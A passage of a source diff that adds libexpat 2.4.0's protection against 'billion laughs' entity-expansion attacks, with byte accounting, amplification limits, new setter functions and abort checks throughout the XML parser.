+@@ -101,10 +101,40 @@
+ # endif
+ #endif
+
++#include <limits.h> // ULONG_MAX
++
++#if defined(_WIN32) && ! defined(__USE_MINGW_ANSI_STDIO)
++# define EXPAT_FMT_ULL(midpart) "%" midpart "I64u"
++# if defined(_WIN64) // Note: modifier "td" does not work for MinGW
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "I64d"
++# else
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
++# endif
++#else
++# define EXPAT_FMT_ULL(midpart) "%" midpart "llu"
++# if ! defined(ULONG_MAX)
++# error Compiler did not define ULONG_MAX for us
++# elif ULONG_MAX == 18446744073709551615u // 2^64-1
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "ld"
++# else
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
++# endif
++#endif
++
+ #ifndef UNUSED_P
+ # define UNUSED_P(p) (void)p
+ #endif
+
++/* NOTE BEGIN If you ever patch these defaults to greater values
++ for non-attack XML payload in your environment,
++ please file a bug report with libexpat. Thank you!
++*/
++#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT \
++ 100.0f
++#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT \
++ 8388608 // 8 MiB, 2^23
++/* NOTE END */
++
+ #ifdef __cplusplus
+ extern "C" {
+ #endif
+diff --git a/lib/libexpat.def b/lib/libexpat.def
+index 16faf595..5aefa6df 100644
+--- a/lib/libexpat.def
++++ b/lib/libexpat.def
+@@ -76,3 +76,6 @@ EXPORTS
+ XML_SetHashSalt @67
+ ; added with version 2.2.5
+ _INTERNAL_trim_to_complete_utf8_characters @68
++; added with version 2.4.0
++ XML_SetBillionLaughsAttackProtectionActivationThreshold @69
++ XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
+diff --git a/lib/libexpatw.def b/lib/libexpatw.def
+index 16faf595..5aefa6df 100644
+--- a/lib/libexpatw.def
++++ b/lib/libexpatw.def
+@@ -76,3 +76,6 @@ EXPORTS
+ XML_SetHashSalt @67
+ ; added with version 2.2.5
+ _INTERNAL_trim_to_complete_utf8_characters @68
++; added with version 2.4.0
++ XML_SetBillionLaughsAttackProtectionActivationThreshold @69
++ XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 3aaf35b9..6790bc28 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -47,6 +47,8 @@
+ #include <limits.h> /* UINT_MAX */
+ #include <stdio.h> /* fprintf */
+ #include <stdlib.h> /* getenv, rand_s */
++#include <stdint.h> /* uintptr_t */
++#include <math.h> /* isnan */
+
+ #ifdef _WIN32
+ # define getpid GetCurrentProcessId
+@@ -373,6 +375,31 @@ typedef struct open_internal_entity {
+ XML_Bool betweenDecl; /* WFC: PE Between Declarations */
+ } OPEN_INTERNAL_ENTITY;
+
++enum XML_Account {
++ XML_ACCOUNT_DIRECT, /* bytes directly passed to the Expat parser */
++ XML_ACCOUNT_ENTITY_EXPANSION, /* intermediate bytes produced during entity
++ expansion */
++ XML_ACCOUNT_NONE /* i.e. do not account, was accounted already */
++};
++
++#ifdef XML_DTD
++typedef unsigned long long XmlBigCount;
++typedef struct accounting {
++ XmlBigCount countBytesDirect;
++ XmlBigCount countBytesIndirect;
++ int debugLevel;
++ float maximumAmplificationFactor; // >=1.0
++ unsigned long long activationThresholdBytes;
++} ACCOUNTING;
++
++typedef struct entity_stats {
++ unsigned int countEverOpened;
++ unsigned int currentDepth;
++ unsigned int maximumDepthSeen;
++ int debugLevel;
++} ENTITY_STATS;
++#endif /* XML_DTD */
++
+ typedef enum XML_Error PTRCALL Processor(XML_Parser parser, const char *start,
+ const char *end, const char **endPtr);
+
+@@ -403,16 +430,18 @@ static enum XML_Error initializeEncoding(XML_Parser parser);
+ static enum XML_Error doProlog(XML_Parser parser, const ENCODING *enc,
+ const char *s, const char *end, int tok,
+ const char *next, const char **nextPtr,
+- XML_Bool haveMore, XML_Bool allowClosingDoctype);
++ XML_Bool haveMore, XML_Bool allowClosingDoctype,
++ enum XML_Account account);
+ static enum XML_Error processInternalEntity(XML_Parser parser, ENTITY *entity,
+ XML_Bool betweenDecl);
+ static enum XML_Error doContent(XML_Parser parser, int startTagLevel,
+ const ENCODING *enc, const char *start,
+ const char *end, const char **endPtr,
+- XML_Bool haveMore);
++ XML_Bool haveMore, enum XML_Account account);
+ static enum XML_Error doCdataSection(XML_Parser parser, const ENCODING *,
+ const char **startPtr, const char *end,
+- const char **nextPtr, XML_Bool haveMore);
++ const char **nextPtr, XML_Bool haveMore,
++ enum XML_Account account);
+ #ifdef XML_DTD
+ static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
+ const char **startPtr, const char *end,
+@@ -422,7 +451,8 @@ static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
+ static void freeBindings(XML_Parser parser, BINDING *bindings);
+ static enum XML_Error storeAtts(XML_Parser parser, const ENCODING *,
+ const char *s, TAG_NAME *tagNamePtr,
+- BINDING **bindingsPtr);
++ BINDING **bindingsPtr,
++ enum XML_Account account);
+ static enum XML_Error addBinding(XML_Parser parser, PREFIX *prefix,
+ const ATTRIBUTE_ID *attId, const XML_Char *uri,
+ BINDING **bindingsPtr);
+@@ -431,15 +461,18 @@ static int defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *, XML_Bool isCdata,
+ XML_Parser parser);
+ static enum XML_Error storeAttributeValue(XML_Parser parser, const ENCODING *,
+ XML_Bool isCdata, const char *,
+- const char *, STRING_POOL *);
++ const char *, STRING_POOL *,
++ enum XML_Account account);
+ static enum XML_Error appendAttributeValue(XML_Parser parser, const ENCODING *,
+ XML_Bool isCdata, const char *,
+- const char *, STRING_POOL *);
++ const char *, STRING_POOL *,
++ enum XML_Account account);
+ static ATTRIBUTE_ID *getAttributeId(XML_Parser parser, const ENCODING *enc,
+ const char *start, const char *end);
+ static int setElementTypePrefix(XML_Parser parser, ELEMENT_TYPE *);
+ static enum XML_Error storeEntityValue(XML_Parser parser, const ENCODING *enc,
+- const char *start, const char *end);
++ const char *start, const char *end,
++ enum XML_Account account);
+ static int reportProcessingInstruction(XML_Parser parser, const ENCODING *enc,
+ const char *start, const char *end);
+ static int reportComment(XML_Parser parser, const ENCODING *enc,
+@@ -503,6 +536,35 @@ static XML_Parser parserCreate(const XML_Char *encodingName,
+
+ static void parserInit(XML_Parser parser, const XML_Char *encodingName);
+
++#ifdef XML_DTD
++static float accountingGetCurrentAmplification(XML_Parser rootParser);
++static void accountingReportStats(XML_Parser originParser, const char *epilog);
++static void accountingOnAbort(XML_Parser originParser);
++static void accountingReportDiff(XML_Parser rootParser,
++ unsigned int levelsAwayFromRootParser,
++ const char *before, const char *after,
++ ptrdiff_t bytesMore, int source_line,
++ enum XML_Account account);
++static XML_Bool accountingDiffTolerated(XML_Parser originParser, int tok,
++ const char *before, const char *after,
++ int source_line,
++ enum XML_Account account);
++
++static void entityTrackingReportStats(XML_Parser parser, ENTITY *entity,
++ const char *action, int sourceLine);
++static void entityTrackingOnOpen(XML_Parser parser, ENTITY *entity,
++ int sourceLine);
++static void entityTrackingOnClose(XML_Parser parser, ENTITY *entity,
++ int sourceLine);
++
++static XML_Parser getRootParserOf(XML_Parser parser,
++ unsigned int *outLevelDiff);
++static const char *unsignedCharToPrintable(unsigned char c);
++#endif /* XML_DTD */
++
++static unsigned long getDebugLevel(const char *variableName,
++ unsigned long defaultDebugLevel);
++
+ #define poolStart(pool) ((pool)->start)
+ #define poolEnd(pool) ((pool)->ptr)
+ #define poolLength(pool) ((pool)->ptr - (pool)->start)
+@@ -616,6 +678,10 @@ struct XML_ParserStruct {
+ enum XML_ParamEntityParsing m_paramEntityParsing;
+ #endif
+ unsigned long m_hash_secret_salt;
++#ifdef XML_DTD
++ ACCOUNTING m_accounting;
++ ENTITY_STATS m_entity_stats;
++#endif
+ };
+
+ #define MALLOC(parser, s) (parser->m_mem.malloc_fcn((s)))
+@@ -1055,6 +1121,18 @@ parserInit(XML_Parser parser, const XML_Char *encodingName) {
+ parser->m_paramEntityParsing = XML_PARAM_ENTITY_PARSING_NEVER;
+ #endif
+ parser->m_hash_secret_salt = 0;
++
++#ifdef XML_DTD
++ memset(&parser->m_accounting, 0, sizeof(ACCOUNTING));
++ parser->m_accounting.debugLevel = getDebugLevel("EXPAT_ACCOUNTING_DEBUG", 0u);
++ parser->m_accounting.maximumAmplificationFactor
++ = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT;
++ parser->m_accounting.activationThresholdBytes
++ = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT;
++
++ memset(&parser->m_entity_stats, 0, sizeof(ENTITY_STATS));
++ parser->m_entity_stats.debugLevel = getDebugLevel("EXPAT_ENTITY_DEBUG", 0u);
++#endif
+ }
+
+ /* moves list of bindings to m_freeBindingList */
+@@ -2318,6 +2396,10 @@ XML_ErrorString(enum XML_Error code) {
+ /* Added in 2.2.5. */
+ case XML_ERROR_INVALID_ARGUMENT: /* Constant added in 2.2.1, already */
+ return XML_L("invalid argument");
++ /* Added in 2.4.0. */
++ case XML_ERROR_AMPLIFICATION_LIMIT_BREACH:
++ return XML_L(
++ "limit on input amplification factor (from DTD and entities) breached");
+ }
+ return NULL;
+ }
+@@ -2354,41 +2436,75 @@ XML_ExpatVersionInfo(void) {
+
+ const XML_Feature *XMLCALL
+ XML_GetFeatureList(void) {
+- static const XML_Feature features[]
+- = {{XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
+- sizeof(XML_Char)},
+- {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
+- sizeof(XML_LChar)},
++ static const XML_Feature features[] = {
++ {XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
++ sizeof(XML_Char)},
++ {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
++ sizeof(XML_LChar)},
+ #ifdef XML_UNICODE
+- {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
++ {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
+ #endif
+ #ifdef XML_UNICODE_WCHAR_T
+- {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
++ {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
+ #endif
+ #ifdef XML_DTD
+- {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
++ {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
+ #endif
+ #ifdef XML_CONTEXT_BYTES
+- {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
+- XML_CONTEXT_BYTES},
++ {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
++ XML_CONTEXT_BYTES},
+ #endif
+ #ifdef XML_MIN_SIZE
+- {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
++ {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
+ #endif
+ #ifdef XML_NS
+- {XML_FEATURE_NS, XML_L("XML_NS"), 0},
++ {XML_FEATURE_NS, XML_L("XML_NS"), 0},
+ #endif
+ #ifdef XML_LARGE_SIZE
+- {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
++ {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
+ #endif
+ #ifdef XML_ATTR_INFO
+- {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
++ {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
+ #endif
+- {XML_FEATURE_END, NULL, 0}};
++#ifdef XML_DTD
++ /* Added in Expat 2.4.0. */
++ {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
++ XML_L("XML_BLAP_MAX_AMP"),
++ (long int)
++ EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT},
++ {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT,
++ XML_L("XML_BLAP_ACT_THRES"),
++ EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT},
++#endif
++ {XML_FEATURE_END, NULL, 0}};
+
+ return features;
+ }
+
++#ifdef XML_DTD
++XML_Bool XMLCALL
++XML_SetBillionLaughsAttackProtectionMaximumAmplification(
++ XML_Parser parser, float maximumAmplificationFactor) {
++ if ((parser == NULL) || (parser->m_parentParser != NULL)
++ || isnan(maximumAmplificationFactor)
++ || (maximumAmplificationFactor < 1.0f)) {
++ return XML_FALSE;
++ }
++ parser->m_accounting.maximumAmplificationFactor = maximumAmplificationFactor;
++ return XML_TRUE;
++}
++
++XML_Bool XMLCALL
++XML_SetBillionLaughsAttackProtectionActivationThreshold(
++ XML_Parser parser, unsigned long long activationThresholdBytes) {
++ if ((parser == NULL) || (parser->m_parentParser != NULL)) {
++ return XML_FALSE;
++ }
++ parser->m_accounting.activationThresholdBytes = activationThresholdBytes;
++ return XML_TRUE;
++}
++#endif /* XML_DTD */
++
+ /* Initially tag->rawName always points into the parse buffer;
+ for those TAG instances opened while the current parse buffer was
+ processed, and not yet closed, we need to store tag->rawName in a more
+@@ -2441,9 +2557,9 @@ storeRawNames(XML_Parser parser) {
+ static enum XML_Error PTRCALL
+ contentProcessor(XML_Parser parser, const char *start, const char *end,
+ const char **endPtr) {
+- enum XML_Error result
+- = doContent(parser, 0, parser->m_encoding, start, end, endPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ enum XML_Error result = doContent(
++ parser, 0, parser->m_encoding, start, end, endPtr,
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
+ if (result == XML_ERROR_NONE) {
+ if (! storeRawNames(parser))
+ return XML_ERROR_NO_MEMORY;
+@@ -2468,6 +2584,14 @@ externalEntityInitProcessor2(XML_Parser parser, const char *start,
+ int tok = XmlContentTok(parser->m_encoding, start, end, &next);
+ switch (tok) {
+ case XML_TOK_BOM:
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, start, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif /* XML_DTD */
++
+ /* If we are at the end of the buffer, this would cause the next stage,
+ i.e. externalEntityInitProcessor3, to pass control directly to
+ doContent (by detecting XML_TOK_NONE) without processing any xml text
+@@ -2505,6 +2629,10 @@ externalEntityInitProcessor3(XML_Parser parser, const char *start,
+ const char *next = start; /* XmlContentTok doesn't always set the last arg */
+ parser->m_eventPtr = start;
+ tok = XmlContentTok(parser->m_encoding, start, end, &next);
++ /* Note: These bytes are accounted later in:
++ - processXmlDecl
++ - externalEntityContentProcessor
++ */
+ parser->m_eventEndPtr = next;
+
+ switch (tok) {
+@@ -2546,7 +2674,8 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
+ const char *end, const char **endPtr) {
+ enum XML_Error result
+ = doContent(parser, 1, parser->m_encoding, start, end, endPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+ if (result == XML_ERROR_NONE) {
+ if (! storeRawNames(parser))
+ return XML_ERROR_NO_MEMORY;
+@@ -2557,7 +2686,7 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
+ static enum XML_Error
+ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ const char *s, const char *end, const char **nextPtr,
+- XML_Bool haveMore) {
++ XML_Bool haveMore, enum XML_Account account) {
+ /* save one level of indirection */
+ DTD *const dtd = parser->m_dtd;
+
+@@ -2575,6 +2704,17 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ for (;;) {
+ const char *next = s; /* XmlContentTok doesn't always set the last arg */
+ int tok = XmlContentTok(enc, s, end, &next);
++#ifdef XML_DTD
++ const char *accountAfter
++ = ((tok == XML_TOK_TRAILING_RSQB) || (tok == XML_TOK_TRAILING_CR))
++ ? (haveMore ? s /* i.e. 0 bytes */ : end)
++ : next;
++ if (! accountingDiffTolerated(parser, tok, s, accountAfter, __LINE__,
++ account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
+ *eventEndPP = next;
+ switch (tok) {
+ case XML_TOK_TRAILING_CR:
+@@ -2630,6 +2770,14 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ XML_Char ch = (XML_Char)XmlPredefinedEntityName(
+ enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
+ if (ch) {
++#ifdef XML_DTD
++ /* NOTE: We are replacing 4-6 characters original input for 1 character
++ * so there is no amplification and hence recording without
++ * protection. */
++ accountingDiffTolerated(parser, tok, (char *)&ch,
++ ((char *)&ch) + sizeof(XML_Char), __LINE__,
++ XML_ACCOUNT_ENTITY_EXPANSION);
++#endif /* XML_DTD */
+ if (parser->m_characterDataHandler)
+ parser->m_characterDataHandler(parser->m_handlerArg, &ch, 1);
+ else if (parser->m_defaultHandler)
+@@ -2748,7 +2896,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ }
+ tag->name.str = (XML_Char *)tag->buf;
+ *toPtr = XML_T('\0');
+- result = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings));
++ result
++ = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings), account);
+ if (result)
+ return result;
+ if (parser->m_startElementHandler)
+@@ -2772,7 +2921,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ if (! name.str)
+ return XML_ERROR_NO_MEMORY;
+ poolFinish(&parser->m_tempPool);
+- result = storeAtts(parser, enc, s, &name, &bindings);
++ result = storeAtts(parser, enc, s, &name, &bindings,
++ XML_ACCOUNT_NONE /* token spans whole start tag */);
+ if (result != XML_ERROR_NONE) {
+ freeBindings(parser, bindings);
+ return result;
+@@ -2907,7 +3057,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ /* END disabled code */
+ else if (parser->m_defaultHandler)
+ reportDefault(parser, enc, s, next);
+- result = doCdataSection(parser, enc, &next, end, nextPtr, haveMore);
++ result
++ = doCdataSection(parser, enc, &next, end, nextPtr, haveMore, account);
+ if (result != XML_ERROR_NONE)
+ return result;
+ else if (! next) {
+@@ -3036,7 +3187,8 @@ freeBindings(XML_Parser parser, BINDING *bindings) {
+ */
+ static enum XML_Error
+ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+- TAG_NAME *tagNamePtr, BINDING **bindingsPtr) {
++ TAG_NAME *tagNamePtr, BINDING **bindingsPtr,
++ enum XML_Account account) {
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+ ELEMENT_TYPE *elementType;
+ int nDefaultAtts;
+@@ -3146,7 +3298,7 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ /* normalize the attribute value */
+ result = storeAttributeValue(
+ parser, enc, isCdata, parser->m_atts[i].valuePtr,
+- parser->m_atts[i].valueEnd, &parser->m_tempPool);
++ parser->m_atts[i].valueEnd, &parser->m_tempPool, account);
+ if (result)
+ return result;
+ appAtts[attIndex] = poolStart(&parser->m_tempPool);
+@@ -3535,9 +3687,9 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ static enum XML_Error PTRCALL
+ cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
+ const char **endPtr) {
+- enum XML_Error result
+- = doCdataSection(parser, parser->m_encoding, &start, end, endPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ enum XML_Error result = doCdataSection(
++ parser, parser->m_encoding, &start, end, endPtr,
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
+ if (result != XML_ERROR_NONE)
+ return result;
+ if (start) {
+@@ -3557,7 +3709,8 @@ cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
+ */
+ static enum XML_Error
+ doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+- const char *end, const char **nextPtr, XML_Bool haveMore) {
++ const char *end, const char **nextPtr, XML_Bool haveMore,
++ enum XML_Account account) {
+ const char *s = *startPtr;
+ const char **eventPP;
+ const char **eventEndPP;
+@@ -3575,6 +3728,14 @@ doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+ for (;;) {
+ const char *next;
+ int tok = XmlCdataSectionTok(enc, s, end, &next);
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#else
++ UNUSED_P(account);
++#endif
+ *eventEndPP = next;
+ switch (tok) {
+ case XML_TOK_CDATA_SECT_CLOSE:
+@@ -3719,6 +3880,13 @@ doIgnoreSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+ *eventPP = s;
+ *startPtr = NULL;
+ tok = XmlIgnoreSectionTok(enc, s, end, &next);
++# ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++# endif
+ *eventEndPP = next;
+ switch (tok) {
+ case XML_TOK_IGNORE_SECT:
+@@ -3803,6 +3971,15 @@ processXmlDecl(XML_Parser parser, int isGeneralTextEntity, const char *s,
+ const char *versionend;
+ const XML_Char *storedversion = NULL;
+ int standalone = -1;
++
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, XML_TOK_XML_DECL, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
++
+ if (! (parser->m_ns ? XmlParseXmlDeclNS : XmlParseXmlDecl)(
+ isGeneralTextEntity, parser->m_encoding, s, next, &parser->m_eventPtr,
+ &version, &versionend, &encodingName, &newEncoding, &standalone)) {
+@@ -3952,6 +4129,10 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+
+ for (;;) {
+ tok = XmlPrologTok(parser->m_encoding, start, end, &next);
++ /* Note: Except for XML_TOK_BOM below, these bytes are accounted later in:
++ - storeEntityValue
++ - processXmlDecl
++ */
+ parser->m_eventEndPtr = next;
+ if (tok <= 0) {
+ if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
+@@ -3970,7 +4151,8 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+ break;
+ }
+ /* found end of entity value - can store it now */
+- return storeEntityValue(parser, parser->m_encoding, s, end);
++ return storeEntityValue(parser, parser->m_encoding, s, end,
++ XML_ACCOUNT_DIRECT);
+ } else if (tok == XML_TOK_XML_DECL) {
+ enum XML_Error result;
+ result = processXmlDecl(parser, 0, start, next);
+@@ -3997,6 +4179,14 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+ */
+ else if (tok == XML_TOK_BOM && next == end
+ && ! parser->m_parsingStatus.finalBuffer) {
++# ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++# endif
++
+ *nextPtr = next;
+ return XML_ERROR_NONE;
+ }
+@@ -4039,16 +4229,24 @@ externalParEntProcessor(XML_Parser parser, const char *s, const char *end,
+ }
+ /* This would cause the next stage, i.e. doProlog to be passed XML_TOK_BOM.
+ However, when parsing an external subset, doProlog will not accept a BOM
+- as valid, and report a syntax error, so we have to skip the BOM
++ as valid, and report a syntax error, so we have to skip the BOM, and
++ account for the BOM bytes.
+ */
+ else if (tok == XML_TOK_BOM) {
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++
+ s = next;
+ tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+ }
+
+ parser->m_processor = prologProcessor;
+ return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++ XML_ACCOUNT_DIRECT);
+ }
+
+ static enum XML_Error PTRCALL
+@@ -4061,6 +4259,9 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
+
+ for (;;) {
+ tok = XmlPrologTok(enc, start, end, &next);
++ /* Note: These bytes are accounted later in:
++ - storeEntityValue
++ */
+ if (tok <= 0) {
+ if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
+ *nextPtr = s;
+@@ -4078,7 +4279,7 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
+ break;
+ }
+ /* found end of entity value - can store it now */
+- return storeEntityValue(parser, enc, s, end);
++ return storeEntityValue(parser, enc, s, end, XML_ACCOUNT_DIRECT);
+ }
+ start = next;
+ }
+@@ -4092,13 +4293,14 @@ prologProcessor(XML_Parser parser, const char *s, const char *end,
+ const char *next = s;
+ int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+ return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++ XML_ACCOUNT_DIRECT);
+ }
+
+ static enum XML_Error
+ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ int tok, const char *next, const char **nextPtr, XML_Bool haveMore,
+- XML_Bool allowClosingDoctype) {
++ XML_Bool allowClosingDoctype, enum XML_Account account) {
+ #ifdef XML_DTD
+ static const XML_Char externalSubsetName[] = {ASCII_HASH, '\0'};
+ #endif /* XML_DTD */
+@@ -4125,6 +4327,10 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ static const XML_Char enumValueSep[] = {ASCII_PIPE, '\0'};
+ static const XML_Char enumValueStart[] = {ASCII_LPAREN, '\0'};
+
++#ifndef XML_DTD
++ UNUSED_P(account);
++#endif
++
+ /* save one level of indirection */
+ DTD *const dtd = parser->m_dtd;
+
+@@ -4189,6 +4395,19 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ }
+ }
+ role = XmlTokenRole(&parser->m_prologState, tok, s, next, enc);
++#ifdef XML_DTD
++ switch (role) {
++ case XML_ROLE_INSTANCE_START: // bytes accounted in contentProcessor
++ case XML_ROLE_XML_DECL: // bytes accounted in processXmlDecl
++ case XML_ROLE_TEXT_DECL: // bytes accounted in processXmlDecl
++ break;
++ default:
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++ }
++#endif
+ switch (role) {
+ case XML_ROLE_XML_DECL: {
+ enum XML_Error result = processXmlDecl(parser, 0, s, next);
+@@ -4464,7 +4683,8 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ const XML_Char *attVal;
+ enum XML_Error result = storeAttributeValue(
+ parser, enc, parser->m_declAttributeIsCdata,
+- s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool);
++ s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool,
++ XML_ACCOUNT_NONE);
+ if (result)
+ return result;
+ attVal = poolStart(&dtd->pool);
+@@ -4497,8 +4717,9 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ break;
+ case XML_ROLE_ENTITY_VALUE:
+ if (dtd->keepProcessing) {
+- enum XML_Error result = storeEntityValue(
+- parser, enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
++ enum XML_Error result
++ = storeEntityValue(parser, enc, s + enc->minBytesPerChar,
++ next - enc->minBytesPerChar, XML_ACCOUNT_NONE);
+ if (parser->m_declEntity) {
+ parser->m_declEntity->textPtr = poolStart(&dtd->entityValuePool);
+ parser->m_declEntity->textLen
+@@ -4888,12 +5109,15 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (parser->m_externalEntityRefHandler) {
+ dtd->paramEntityRead = XML_FALSE;
+ entity->open = XML_TRUE;
++ entityTrackingOnOpen(parser, entity, __LINE__);
+ if (! parser->m_externalEntityRefHandler(
+ parser->m_externalEntityRefHandlerArg, 0, entity->base,
+ entity->systemId, entity->publicId)) {
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ return XML_ERROR_EXTERNAL_ENTITY_HANDLING;
+ }
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ handleDefault = XML_FALSE;
+ if (! dtd->paramEntityRead) {
+@@ -5091,6 +5315,13 @@ epilogProcessor(XML_Parser parser, const char *s, const char *end,
+ for (;;) {
